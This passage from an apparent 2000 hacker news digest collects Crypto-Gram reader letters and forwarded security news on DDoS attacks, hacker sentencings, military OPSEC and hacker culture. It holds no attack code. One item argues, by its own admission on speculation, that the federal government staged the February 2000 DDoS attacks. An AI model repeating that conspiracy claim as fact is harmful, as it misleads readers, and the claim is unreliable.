A non-life-safety version of this problem was the publishing of a script that gave an existing process root privileges using the memory debugger abilities of the console monitor ("L1-A") of a Sun. This debugger could be disabled, but nobody did because it disabled the software reset button. This reported vulnerability allowed users to adjust their trust of the security of root sharply downward, corresponding more closely to the actual security of it in practice.

> Third, I believe that it is irresponsible, and possibly criminal, to
> distribute exploits.

This is gun control: "Don't punish murder, ban the gun instead! Exploits are an evil instrumentality! Exploits help a good boy go bad!" The right answer is: Humans are held responsible for their behavior. Guns, bricks, and exploits are just tools.

From: Greg Guerin
Subject: publicity attack loops?

I have to admit that I was chuckling all the way through the Fernandes/Cryptonym letter in the Feb 2000 Crypto-Gram. Especially when at the end he wraps himself in the mantle of professional integrity.

I've already written two essays on the Fernandes discovery and his downloadable "repair" ZIP:

Though neither one is about Fernandes's professional integrity, per se, they do make a number of points about specific practices. To summarize the points (see the essays for the full explanation):

1) the ZIP held 2 EXE's, 2 DLL's, and 1 source file.
2) the downloadable ZIP had no digital signature.
3) nothing within the ZIP had a separate digital signature.
4) Fernandes's PGP key had no introducers at all.
5) no pointers to others who could vouch for points 2-4.
6) source was not compilable as supplied (missing header).

Point 6 is only a little important because it means the EXE's must be trusted as given. But there was only one source file anyway, so you're already trusting the other EXE completely. And both DLL's must be trusted completely. Risk-wise, 75% blind trust is virtually identical to 100% blind trust, so it's not all that useful a distinction. It's like choosing whether to kill something 3 times over or 4 times -- correctly killing it once suffices.

Note that at no point does "professional integrity" come into this, only "professional practice". I'm not disputing INTENT (integrity), I'm only describing OUTCOME (practice). Spotless integrity and intent cannot long survive avoidable errors in practice.

By observing practices an observer might infer skill, integrity, or both, or neither. Those judgements, and the trustworthiness criteria underlying them, are left completely to the particular observer. All I can say is what I would infer from my observations, and why. You should draw your own conclusions, since my criteria for trustworthiness may differ from yours. But you should also invest in understanding why you came to those conclusions -- flaws in the process can lead you astray.

From: "Rolf Oppliger"
Subject: Distributed Denial-of-Service Attacks

First of all, I'd like to congratulate you for your description and analysis of distributed denial-of-service (DDoS) attacks in the February issue of your Crypto-Gram newsletter. I fully agree with most of your statements, including your pessimistic view that all existing approaches to address the problem are unsatisfactory in one way or another.

In your article, however, you also argue that "in the long term, out-of-band signaling is the only way to deal with many of the vulnerabilities of the Internet, DDS attacks among them." I don't agree with this statement. Any out-of-band signaling channel can also be subjected to DoS and DDoS attacks.
I believe that the reason why telephone networks are not subjected to large-scale DoS and DDoS attacks is due to the fact that they address charging and billing, rather than their use of out-of-band signaling (out-of-band signaling has many advantages in other areas). Trying to establish a huge quantity of connections in a telephone network is simply too expensive ...

I think that the lesson learnt from telephone networks is that packet-based charging and billing -- combined with adequate security mechanisms -- may be a viable solution to protect against large-scale DoS and DDoS attacks on the Internet (rather than out-of-band signaling). However, packet-based charging and billing also has many disadvantages, including, for example, a huge administration overhead. Consequently, I guess that packet-based charging and billing will not be applied on the Internet, and that "intelligent" packet-filtering performed by ISPs will be the major weapon to protect against large-scale DoS and DDoS attacks in the future.

From: Ethan Benatan
Subject: Defending Against DOS Attacks: Draining the Swamp

If you'll pardon the musings of a biologist, I'd like to comment on your swamp analogy. I know you never stated so but it bears pointing out that swamps are not "bad" in any defensible sense, nor is draining them "good," even though doing so may have one immediate desirable consequence. I am sure that in your own field you can think of many examples where a cure, though effective, may have been worse than the disease. The RISK here is forgetting that in any complex system change comes at some cost; the more complex (or less well understood) the system, the harder it is to predict the cost. I think this applies to the Internet. It certainly applies to the natural world, in spades. I will not bore you with examples.
From: pclites@cdsfulfillment.com
Subject: deCSS

In the February 2000 Crypto-Gram, you wrote: "An important point is that DVDs can be copied and pirated without using deCSS or any other decryption, which certainly makes the original claim of 'prevents piracy' look either astoundingly ignorant or brazenly deceptive."

There is a sense in which the "prevents piracy" claim makes sense. deCSS makes it easy to copy the data on a DVD not just onto another DVD, but into another format, one which is easier to copy & transmit. In that sense, one could characterize it as making piracy easier. Kind of like the rationale behind the distinction between printed & electronic versions of source code in the original crypto export restrictions; but for a consumer data product, I think it's a more meaningful distinction.

I would have to characterize the court's ruling as a correct application of a bad law, in what may turn out to be a watershed case.

From: "Bryan Alexander"
Subject: Secure Linux

> The NSA has contracted with Secure Computing Corp. for
> a secure version of Linux. Personally, I don't know if
> the Linux license allows the NSA to make a secure version
> of the operating system if they are not going to freely
> distribute the results.

Actually the GPL (Gnu Public License, which covers almost all parts of Linux) does allow this. There is no language in the license that requires that you redistribute anything based on the GPL, only what you are required to do *if* you redistribute a work based on the GPL. In addition, the GNU Project has said specifically that the license is not intended to prevent people from creating (without being forced to distribute) their own modified versions of GPLed software for their own use.

The text of the GPL is located at: .

A statement about being forced to distribute modified versions of software being an "unacceptable restriction" can be found at under the heading "Disrespect for Privacy."
This is part of a discussion of the "fatal flaws" in the Apple APSL license. (I can't find the original source for the comment about this as it relates to the GPL right now, sorry.)

** *** ***** ******* *********** *************

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on computer security and cryptography.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com.

Please feel free to forward CRYPTO-GRAM to colleagues and friends who will find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is founder and CTO of Counterpane Internet Security Inc., the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on computer security and cryptography.

Counterpane Internet Security, Inc. is a venture-funded company bringing innovative managed security solutions to the enterprise. http://www.counterpane.com/

Copyright (c) 2000 by Counterpane Internet Security, Inc.

@HWA

219.0 ISN:Mar 18th:Microsoft fends off hackers with Windows 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[Moderator: Ugh, this is a load. A "syn-flood" is designed to drive up CPU usage? Windows 2k fended this 'hacker' attack off?]
Forwarded From: "Noonan, Michael D"
(courtesy of Paul Thurrott's WinInfo - http://www.wininformant.com)

Microsoft fends off hackers with Windows 2000

In a controversial move sure to put the company square in the crosshairs of every hacker on the planet, Microsoft Corporation announced this week that it had successfully beaten off a "syn-flood" hacker attack Tuesday. As the Register's John Lettice notes, the company might have been better served by keeping the matter quiet. The attack, which is designed to bring a Web site to its knees by overloading processor capability, did little to slow down, let alone crash, the heavily clustered Microsoft Web site. The company says that it suffered only a 3-7% slowdown for a short period of time.

"It was very minor, to be honest, so some people saw some slowdowns," said Microsoft spokesperson Adam Sohn. "We have a ton of overhead on this site. We can support terabytes and terabytes of downloads."

The attack on Microsoft is the latest in a series of Web site attacks in recent weeks. Most of the previous attacks, which crippled Web sites such as Yahoo and eBay, were denial of service (DOS) attacks, which are designed to overload a Web server, making it incapable of serving actual users. Investigators have yet to pinpoint the culprits in the previous attacks. Microsoft says that it was able to determine where the attack on its Web site came from, however. The company alerted authorities and shut off their access to the company's Web site.

Naturally, Microsoft credited Windows 2000 with saving the day. "The guys running the network swear to me that a year ago we would have been in big trouble, but with Windows 2000, nobody could knock our servers over," Sohn said. "Between the robustness of the OS and the security features built in, it really helped withstand the attack."

Now doesn't that sound like a challenge?
ISN is sponsored by Security-Focus.COM

@HWA

220.0 ISN:Feds Behind Recent Massive Web Hacking/Fwd
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2.23.00

Feds Behind Recent Massive Web Hacking/Fwd

During the unprecedented massive blitz of hack-attacks which brought some of the world's most active websites to an utter standstill in the second week of February through implementation of DDoS (distributed denial of service) tactics, NewsHawk made a basic "call" on the situation. To wit: we postulated that the hack-attacks, implemented on a scale and to an extent previously unheard-of, were most likely carried out by spooky cyber-goon squads in the employ of our beloved federal government.

Since I am by no stretch of anyone's imagination what could even remotely be considered a computer geek or wirehead, nor am I particularly strong on researching issues which don't directly concern me, I made my call on the scene, solicited and published opinions from our mailing list on the situation and pretty much left it at that.

Well, it turns out I wasn't the ONLY one who was more than a little bit suspicious that feds may have had more than a little bit to do with the hacking blitz. Indeed, MacAddict columnist Rich Pizor outdid us by a mile and actually researched the background of the whole situation: in particular with respect to certain proposals for an "Internet Gestapo" kind of deal known as the Federal Investigation and Detection Network, or FIDNet, which the Clinton gang had just recently been advancing as a means of "patrolling" cyberspace.

The deafening chorus of either boos, hisses or just plain silence from all quarters which greeted the Clintonistas' Brave New World-style proposal caused a retreat of sorts, but according to Pizor's view, most likely only a temporary one.
Indeed, one just long enough for these gangstas and goons to lick their wounds and come up with a PLAN which would make everyone fall slavishly in line with their malignant (as usual) machinations and devious schemes. Namely: the initiation of the overwhelming hack-attack tidal wave and blitzkrieg which devastated the Web a couple of weeks ago.

It's an old Machiavellian game. Create a previously non-existent problem, and then let everyone cry and beg for you to provide a solution.

Sheesh. And you thought WE get out on a limb with these kooky conspiracy scenarios. But seriously, we think Pizor is in fact ONE HUNDRED PERCENT correct in his suppositions.

And what's REALLY interesting to us at NewsHawk, considering what we've put up with lately in terms of "mysteriously" missing or diverted emails and related malicious harassment, is the notice tacked on the end of Pizor's article (which we've reprinted in full below):

"We were unable to bring you this column at its expected time and place in the Monday newsletter because our email server was having problems and our web site may have been under attack. COINCIDENCE?????"

Uh... "coincidence"? No f**king WAY! As Charlie Chan used to say: "too many coincidence, no longer a coincidence."

Get the picture?

=-=-=-=

Trigger Man
by Rich Pizor
mon feb.23

A prevailing stereotype about the Internet is that it's full of crackpots hawking hare-brained conspiracy theories to anyone who will listen. Any responsible media outlet should consider it their job to present a solid, professional appearance in an attempt to countermand that stereotype. I'm therefore pleased to bring you a crackpot conspiracy theory of my own, which revealed itself to me when I connected the dots while reviewing the recent spate of Distributed Denial of Service (DDoS) attacks.

Before we proceed any further, I must indulge in one act of contrition. I didn't want to go here. Really, I didn't.
But companies and websites that no one's ever heard of are blaming every little outage or security flaw on the omni-present shadow of hackers, crackers, cyberterrorists and iSaboteurs. I feel then that it is my right -- nay, my solemn duty -- to correct the balance and proffer speculation (since that's all that any of this really is) as to what might have really happened. Our legal department also wants me to point out that neither myself, MacAddict.Com, nor Imagine Media are necessarily making any formal allegations. That being said...

In order to understand the elegance of what's going on here, we need to go back in time to the middle of last year. It all started with what the Clinton administration obviously assumed would be an innocuous and welcome announcement: Clinton had pushed forth a proposal for something called FIDNet, or the Federal Investigation and Detection Network. A controversial proposal to say the least, but the plan drew particular fire in late January as EPIC (among others) loudly denounced the plan, saying that it would lead to nothing more than an Orwellian information state. So Clinton (not uncharacteristically) backed down...just days before the first DDoS attack incapacitated Yahoo for a day, along with twelve other major sites over the course of the next week -- seven of which have come forth with reports.

Suddenly everything became the fault of crackers. A man in Virginia was even inspired to launch his own DoS attack on the Virginia DMV website (he only used his own computer, so there was no Distributed nature to it). Certainly coincidental timing for a President who's trying to get an unreceptive public to go along with his draconian cybersecurity plan. Especially given Janet Reno's recent testimony before Congress regarding the need for formalized laws on Internet security, citing those very attacks as her justification.

But it gets better.
Two days after the first attack, the FBI held a press conference in which they vowed to catch the perpetrator(s) but also admitted that they didn't have any idea, at that time, who did it. "A 15-year-old kid could launch these attacks," said the Bureau's Ron Dick (with a name like that it's no wonder he wound up in the FBI). Only a few days later, the news bubbles out that they're hot on the trail of a suspect named "mafiaboy" -- surprise surprise, a 15-year-old kid, conveniently in Canada and out of the Feds' reach without cooperation from the Royal Canadian Mounted Police.

Most in the hacking community scoff at the thought that "mafiaboy" could be involved in anything more than a copycat role. He's widely considered to be a "script kiddie" -- an amateur cracker seeking fame through his exploits using tools downloaded off the Internet. So it's puzzling that the Feds would want him that badly; the name "Lee Harvey Oswald" keeps coming to mind. It's also unclear why they want to find Mixter -- an anonymous German hacker who may have authored one or more of the tools that may have been involved -- when he has publicly stated that he didn't do it, and the tools he may have authored were never released publicly except with the intention of studying DDoS attacks and how to counter them. The only other lead that's been made public is an anonymous email sent to Attrition.org (a site that archives hacked Web pages) that even the site's webmaster isn't taking too seriously.

Am I coming right out and saying that the government we elected is behind all of this? Not directly. I have a hard time seeing most elected officials even being able to use a word processor, let alone pull off something like this. But you have to admit, the timing of all of these events is mighty convenient -- and while it's unlikely that they could have done it themselves, all it takes is money and connections to arrange for someone to pull a trigger.
It calls to mind Judd Hirsch's line from Independence Day: "Well you didn't *really* think they paid $500 for a hammer did you?"

NOTE: We were unable to bring you this column at its expected time and place in the Monday newsletter because our email server was having problems and our web site may have been under attack. COINCIDENCE?????

Rich Pizor is the pseudonym of the man who claims to be Online Content Editor for MacAddict.com -- if he told you any more than that, he'd have to kill you. When he isn't hatching looney theories like this one, Rich types inflammatory things in chat rooms in the hopes of gaining immortality in an Echelon log.

ISN is sponsored by Security-Focus.COM

@HWA

221.0 ISN:Hacker 'Gatsby' Gets 18-Month Sentence
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: "John Q. Public"
http://www.foxnews.com/vtech/030500/hack.sml

Hacker 'Gatsby' Gets 18-Month Sentence
7.19 a.m. ET (1219 GMT) March 5, 2000
Associated Press

SAN DIEGO - A computer hacker known online as "The Gatsby" will spend 18 months in federal prison. A judge in San Diego has sentenced Jonathan Bosanac for electronically breaking into some of the country's largest computer systems. The judge said his wrongdoing caused more than $1 million in damage to one company alone.

Bosanac was ordered to pay $10,000 in restitution to three telephone companies he hacked into. He pleaded guilty in December to participating in one of the nation's biggest hacking schemes. The crimes took place more than five years ago. Friends say the man's life has since turned around. He's been working as a computer consultant.

ISN is sponsored by Security-Focus.COM

@HWA

222.0 ISN:Naval officer in hot water over policy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: William Knowles
http://www.defensenews.com/dtemp/gomez.html

WASHINGTON - A U.S. Navy petty officer who engaged in a recent Internet discussion of network security issues has inadvertently sparked a major controversy regarding military operations security, and whether Pentagon policy has kept up with the Information Age.

Operations security (OPSEC) is closely related to information operations. Its primary goal is to "force the adversary commander to make faulty decisions based upon insufficient information and/or to delay the decision making process due to a lack of information," according to the Pentagon's joint doctrine written in 1997.

During the height of the Cold War, military members were warned not to discuss such seemingly harmless things as unit morale, readiness or upcoming training missions because bits of information can be pieced together to learn a great deal about military operations. The Pentagon in October ordered that all military Internet sites be scrubbed of personal or sensitive tactical information.

Now the Navy is investigating actions taken by Gene Gomez, a petty officer second class aboard the USS Essex - actions some experts say may provide potential adversaries with sensitive technical information that could allow them to infiltrate military networks, or make Gomez and his family vulnerable to terrorist activity. While he is under investigation, the former network administrator has been denied access to the ship's networks, has had his shipboard electronic mail capabilities disabled, and had his separation of service papers placed on hold.

Gomez refused to comment on the situation. "I want to ensure that I don't get into any more trouble," Gomez told Defense News.

On Dec. 18, Gomez engaged in a discussion on an electronic mailing list organized by the computer security Internet site AntiOnline. The topic of the discussion was how to bypass some particular network security measures. In addition, he used his official electronic mailing address aboard the Essex, and signed his full name and rank.
The e-mail caught the attention of Rick Forno, co-author of the book, "The Art of Information Warfare." Forno wrote and published on the Internet an article, "The Need for Common Sense, Not Only Technical Competence," blasting Gomez's actions.

"Several aspects of [Gomez's] electronic mail messages are frightening, and should serve as a wake-up call to the military leadership regarding their perceived levels of OPSEC awareness throughout the military," Forno wrote.

Forno conducted an Internet search on Gomez's name and found that earlier he had written to Happy Hacker Digest and to a group of so-called white hat hackers, the network security organization known as L0pht Heavy Industries. In these two separate messages, Gomez was seeking advice on how to disable some network functions he felt could be used to gain unauthorized access. Forno also found Gomez's personal Internet home page; a wealth of personal information; and information about the systems the sailor works with, including the Joint Maritime Command Information System, a strategic level command and control system.

The article ignited a controversy, and led to a minor cyber war of words between Forno and Gomez and their respective supporters.

The Pentagon effort to scrub Internet sites of such information did not address the issue of military members disclosing the same kind of information on non-military Internet sites. And Gomez is not the only military member using non-military Internet sites to disclose information that may not be allowed on military sites. Lt. Cmdr. Sheila Scarborough, executive officer aboard the USS Fort McHenry, for example, maintains a personal Internet site that offers details about her family, life aboard ship, and the ship's operations. Scarborough did not respond to Defense News questions mailed electronically.
In addition, the Navy continues to provide daily Internet updates on the number of personnel on duty, the number of operational aircraft and ships, and the deployment status of the Fifth, Sixth and Seventh fleets. As of Jan. 3, the Navy listed 14 ships, 95 aircraft and 7,969 sailors and marines in the Persian Gulf.

In an interview with Defense News, Forno downplayed the actual damage Gomez might have done to OPSEC, but said the situation "is indicative of the lack of online security awareness within the Department of Defense." In the aftermath of Gomez's alleged security violations, Forno and others now are calling for the Pentagon to take further steps to establish what should not be revealed by military members on non-military Web sites.

"The Pentagon has not kept up with the Internet, despite being its parent. And yes, the Internet should be subject to OPSEC regulations, just as phones, radios, and message traffic is," said Ed Markin, a retired Navy pilot. "Odds are the vast majority of senior military officers have no concept of what all transpires on the Internet."

Susan Hansen, Pentagon spokeswoman, countered that the Pentagon already has taken steps to caution military members on use of the Web.

"The current [OPSEC] directive was updated and signed out by Deputy Secretary John Hamre on Nov. 29. It does include a specific reference to the World Wide Web by stating that 'the Department of Defense maintains heightened awareness of potential threats of adversaries taking advantage of publicly available information and other detectable unclassified activities to derive indicators of U.S. intentions, capabilities, operations and activities'," Hansen said.

The Navy's public affairs office did not respond by press time to a request for comment.
ISN is sponsored by Security-Focus.COM

@HWA

223.0 ISN:Police to step up fight against e-crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Police to step up fight against e-crime
Source: AAP | Published: Friday March 17, 3:38 PM

Police are set to recruit computer boffins in a bid to boost the fight against so-called e-crime.

The potential to commit crimes using computers and other information technology was one of the greatest problems ever to face law enforcement, Australian Federal Police Commissioner Mick Palmer said today.

Speaking at the end of a week-long conference of police commissioners from Australia, New Zealand, Fiji and Papua New Guinea, Commissioner Palmer said a staggering 900 million people would be using the Internet by the end of this year.

'People who abuse these technologies have the capacity to commit offences on a global basis, with complete anonymity, with speed and on a scale not previously encountered,' Commissioner Palmer told journalists.

Credit card fraud, electronic vandalism, terrorism, electronic money laundering and tax evasion are some examples of electronic crime.

'The capacity of properly organised, electronic based crime to undermine the financial stability of small and medium sized countries is very real,' Commissioner Palmer said.

A major problem for police is how to attract personnel with enough technical expertise to fight this new crime. Commissioner Palmer said already police recruitment and selection was becoming more flexible.

'Clearly some of the technical skills that we are going to need ... come at a very high cost,' he said. 'People ... in that industry are earning a lot of money and that makes the partnerships with business and the wider business community very important.'

Police will be looking to exchange staff with private industry to gain the skills necessary, probably on short term, project based arrangements.
Commissioner Palmer said discussions and negotiations had already begun on this issue and Commonwealth Bank CEO David Murray addressed the commissioners.

'We will be recruiting people from the coalface for short periods of time, we are going to be sharing resources between ourselves and the wider partnership both in the private and public sense.'

The commissioners agreed to establish an Electronic Crime Steering Committee to evaluate Australasia's capacity to fight electronic crime. It will develop an Australasian Law Enforcement Electronic Crime Strategy by the end of June.

@HWA

223.0 W00T:You already read section 223.0 you dumb ass.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Fucking huge issue this isn't it? wtf am I nuts!?! no one even reads this thing. Yeah it's a hidden track.

wow....we're possibly going to be affiliated with EUA coz like they're cool and shiznitz and besides _jeezus_ told me to. Also the IBT people may be dragging my sorry ass into their fold, but we'll see... I have some issues there. Lessee, oh yeah i'm in b0f now, why? vanity of course. besides I passed the brainbench lame internet security cert exam (lol/phear).

Military box has been probing my windows machine (one I surf and mail from) ds-1.chamb.disa.mil, I couldn't connect back, it gave me a net unreach error so I guess it's firewalled. If you're reading this, you guys should just join #EFnet IRC and /join #hwa.hax0r.news and chat. Don't probe my fucking box or i'll bite back. seen? you're not even my country's military, keep yer nose out and stop fucking strongarming the milmail people. assholes. I know who you are.

To the guy that mailed me trying to get on the mailing list with "adept" in your name... first you mailed a trap email address, where did you find that one? second yeah i'm the same guy that's in #feed-the-goats what of it? who are you? :-))

End of hidden track.

Cruci- (C*:.)
224.0 ISN:Developers blasted on security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: William Knowles
http://www.wired.com/news/politics/0,1283,34865,00.html

WASHINGTON -- A top cyber security expert blasted software developers Thursday for marketing flawed products that he said boosted the Internet's vulnerability to hacker attacks.

"There is little evidence of improvement in the security features of most products," said Rich Pethia, director of a federally funded computer emergency response operation at Carnegie Mellon University in Pittsburgh. "Developers are not devoting sufficient effort to apply lessons learned about the sources of vulnerabilities."

Pethia made his comments to a congressional panel looking into the so-called denial-of-service attacks that disrupted access to popular Web sites last month for a few hours at a time.

He said his organization, which responded to more than 8,000 computer security incidents last year, up from 132 in its first full year of operation 10 years ago, had found the same types of security defects in newer versions of products as in earlier ones.

"Technology evolves so rapidly that vendors concentrate on time to market, often minimizing that time by placing a low priority on security features," he said in a statement to a subcommittee of the House Committee on Government Reform.

The alleged lack of urgency in plugging such cracks is unlikely to change until customers demand products that are more secure, Pethia said. Pethia did not criticize any companies by name in his prepared statement to the panel.

ISN is sponsored by Security-Focus.COM

@HWA

225.0 ISN:"Islands in the clickstream, in defense of hacking"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: richard@thiemeworks.com

The following article was published in the Village Voice, February 16 - 22, 2000 and the LA Weekly under the title "Hacking the Future."

Islands in the Clickstream: In Defense of Hacking

Let's get our definitions straight.
Last week's attacks on dozens of Web sites were not the work of hackers. They were the work of script kiddies, and the difference is everything. Script kiddies download ready-made tools and use them to damage the network. Script kiddies criminally distort the essential ethos of hacking, which is to pass through the network without a trace. Hackers read the unknown, sense the contours of the codes that make tomorrow's booms and busts. It's no wonder that last week hackers everywhere cringed when the media confused them with script kiddies.

Not less than 10 years ago, the word hacker conjured a dedicated geek, hunched over a glowing terminal, working late into the night to solve an intractable dilemma. Now hacker means something akin to cybercriminal. The semantic shift is regrettable, not only because the distortion inhibits clarity, but because it buries a piece of history we'd be wise to keep fresh: It was hackers who cobbled together the Internet.

Hacking is a quest for knowledge. You can see the essence of the activity in meetings at security firms like Secure Computing, where hackers are a key part of the professional services team. With clients in the Fortune 500 and three-letter government agencies, like DOD and NSA, the stakes are high, and when the firm faces a perplexing problem, brainstorming sessions go late into the night. Ideas fly from one person to another like pinballs off flippers, as the group mind turns over and examines the puzzle from all sides.

The concept of a "group mind" flows from the structure of the Internet itself, parallel processor harnessed to parallel processor to achieve a single goal. It's no coincidence that information technology professionals often think in a style similar to the way computers calculate. The network taught them how to reason digitally; it imprinted itself on their minds just as they imprinted their minds on it. Is it any wonder, then, that hackers are the leaders of the new millennium?
By leader I mean someone who forges ahead and names the emergent realities of the dim future. Consider Tim Berners-Lee, who designed the first Web protocols and wrote the first browser code. Berners-Lee was a hacker. Or consider Richard Stallman, the evangelist of Open Source software. Stallman is an extraordinary hacker.

I recently consulted with a major mutual fund, and after the meeting I traded war stories with its head of IT. He fondly recalled the old days of hacking Unix systems. That this former "delinquent" now runs a system executing billion-dollar transactions is not shocking. Most of the bright people in the IT business learned how to hack by-what else?-hacking.

Let's go back to Open Source for a moment. It's now the conventional wisdom that the Linux operating system and GNU Project are miracles of modern computing, which may one day triumph over the clunky software produced by the Microsoft-Apple cartel. Stallman launched the GNU Project by asking hackers to volunteer their services. Of course, they did. Likewise, Linux was founded on the belief that complex systems must be open, evolving, and free in order to reach their full potential. In other words, they must be hackable and they must be hacked. Continuously.

Now comes the FBI and President Clinton with criminal sanctions for these script kiddies. It's right and just to keep the peace, but let's remember that in the Internet's embryonic stage, hacking, far from being criminal, was encouraged. When computers were first networked through telephone lines and slow modems, bulletin boards emerged as crossroads where cybertravelers could leave messages and valuable information about how the phone lines intersected with microprocessors. By these postings, the network formed a symbiotic relationship with its users, and through the give and take of countless exchanges between hackers, the network bootstrapped itself to a higher level of complexity.
As Tom Jackiewicz, who helps administer upt.org, an outgrowth of the hackers' favorite, the UPT Bulletin Board, recalls, "In the old days of a decade ago, no kid could afford a Solaris workstation. The only machines available were online. You could learn only by roaming the network."

Today the stakes are higher, security tighter, but the basic modalities of hacking and its relationship to innovation remain. The challenge du jour is the gauntlet thrown down by Microsoft, which claims that Windows NT, the operating system of many businesses, is secure. What a claim! For a baseball fan it would be like hearing the Yankees brag that they could play an entire season without losing a single game.

Hackers love to find flaws in Windows NT. For them, the payoff is the power rush of the thunk! when the stone hits Goliath in the forehead. One of the sharpest stones to leave a hacker's sling is a program called Back Orifice 2000. Developed by a group called Cult of the Dead Cow, the program can be loaded stealthily on a Windows network, giving a remote user control over the network.

Why develop such a weapon? In the current environment of ubiquitous distributed computing-that is, networks and nodes everywhere-the hackers argue that no operating system protects against stealthy executables like Back Orifice. So the program is a form of shock therapy. It jerks Microsoft into action, stirring an indolent industry into making the Internet more secure. The upgrades that come as a result benefit every Windows user.

As a culture we are just beginning to recognize this dynamic. One of the first hacker groups to benefit from our grudging acceptance of the craft is LOpht, which crossed over from the computing underground to the mainstream after finding flaws in Windows NT. Their transition has been so successful that when Congress conducted an investigation into Internet security it asked two LOpht members, Mudge and Weld Pond, to come to Washington for a briefing.
Now LOpht has teamed up with former Compaq Computer executives to form @Stake, a security firm that has the media and Wall Street swooning. So when is a hacker not a felon? When he receives $10 million in venture capital? When Congress invites him to a hearing?

When we lump all hackers into a criminal class we are liable to forget their essential role as architects of the information age. Edward O. Wilson said that scientists are characterized by a passion for knowledge, obsession, and daring. Hackers share that passion, the hunter-gatherer gene for restless wandering, wondering what's beyond the next hill. They hack because it's fun, because it's a challenge, and because the activity shapes their identity. Their strengths-love of risk, toleration of ambiguity, and ability to sift meaning from disparate sources-power the very network we all rush to join.

**********************************************************************

Islands in the Clickstream is an intermittent column written by Richard Thieme exploring social and cultural dimensions of computer technology and the ultimate concerns of our lives. Comments are welcome.

Feel free to pass along columns for personal use, retaining this signature file. If interested in (1) publishing columns online or in print, (2) giving a free subscription as a gift, or (3) distributing Islands to employees or over a network, email for details.

To subscribe to Islands in the Clickstream, send email to rthieme@thiemeworks.com with the words "subscribe islands" in the body of the message. To unsubscribe, email with "unsubscribe islands" in the body of the message.

Richard Thieme is a professional speaker, consultant, and writer focused on the impact of computer technology on individuals and organizations - the human dimensions of technology and work - and "life on the edge."

Islands in the Clickstream (c) Richard Thieme, 2000. All rights reserved.
ThiemeWorks on the Web: http://www.thiemeworks.com and http://www.richardthieme.com

ThiemeWorks
P. O. Box 170737
Milwaukee WI 53217-8061
414.351.2321

*********************************************************************

ISN is sponsored by Security-Focus.COM

@HWA

226.0 ISN:Man angry at employer swallows own head.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.sjmercury.com/breaking/docs/073358.htm

NEW YORK (AP) [03.15.2000] - A database engineer angry at his employer was arrested on charges of using codes to disable computers in a three-day cyber attack on the company, authorities said Wednesday.

Abdelkader Smires, 31, was arrested Tuesday and charged with intentionally causing damage through the unauthorized use of a computer.

Computers at Internet Trading Technologies crashed for several hours over the three-day period beginning March 9. The attacks were traced to a computer at Queens College and authorities determined that Smires, who had once taught computer science there, had been using that computer, according to a criminal complaint.

The company processes trades electronically for members of the National Association of Securities Dealers.

The alleged attacks began after Smires and another engineer -- who was not named -- refused to help consultants and other workers learn the company's new operating system without more money, job security and equity, authorities said.

On March 8, the company offered Smires a $70,000 raise, $50,000 in stock options and a one-year contract, but Smires turned them down, authorities said.

The charge is punishable by up to five years in prison. Smires was in jail without bail pending a hearing Friday in federal court. He was to be assigned a public defender. Calls to the public defender's office were not immediately returned Wednesday.

*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions             http://www.c4i.org
*-------------------------------------------------*

ISN is sponsored by Security-Focus.COM

sniff.

@HWA

227.0 ISN:Nasa division battles the hack from ipanema.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.newsbytes.com/pubNews/00/145708.html

By Robert MacMillan, Newsbytes
WASHINGTON, DC, U.S.A., 15 Mar 2000, 1:15 PM CST

From Antonio Carlos Jobim to the samba, the US generally has welcomed some of the cooler cultural exports from Brazil, but the latest one - a series of hack attacks on NASA's Jet Propulsion Laboratory at CalTech - has the agency bossa nova-ing its way toward beefing up its security measures.

JPL Spokesman Frank O'Donnell confirmed for Newsbytes an MSNBC report that the agency has shut down access to queries emanating from Brazil until the agency's security team makes some necessary improvements to its network.

O'Donnell said that the Brazil shutout was not a "blacklist" attempt, as earlier reports indicated.

"There was a number of recent attacks on JPL hosts originating from various sites in Brazil, and as a temporary move while our computer security people work, we're blocking network access to JPL from Brazil," O'Donnell said. "But this is a temporary thing."

He said normal service to South America's largest nation would return "in a matter of days at most." He added that he is "not aware of any (security) compromises per se in these attacks."

Highly secure data at JPL generally is not stored on hosts that are connected to the Internet, O'Donnell also said, but added that he could "not go into a great deal of detail" on what kind of information was sought.

MSNBC reported the Brazil problem after a network analyst at the Bank of Brazil in Brasilia reported that he could not access the JPL site.
The service also reported that a CERT official at its headquarters in Pittsburgh, Pa., said that blocking access to an entire network or country is reasonably common, though the official said that in spoofing attacks - when the address of the attacking e-mail in a denial of service attack is falsified - blocking against a particular domain or country code becomes largely ineffective.

O'Donnell said that CERT and the JPL have been working jointly on security issues.

ISN is sponsored by Security-Focus.COM

@HWA

228.0 ISN:Toys'R'Us
      ~~~~~~~~~~~~~

http://www.washingtonpost.com/cgi-bin/gx.cgi/AppLogic+FTContentServer?pagename=wpni/print&articleid=A52710-2000Mar10

Toys 'R' U.S.

By William M. Arkin
Special to washingtonpost.com
Monday, March 13, 2000

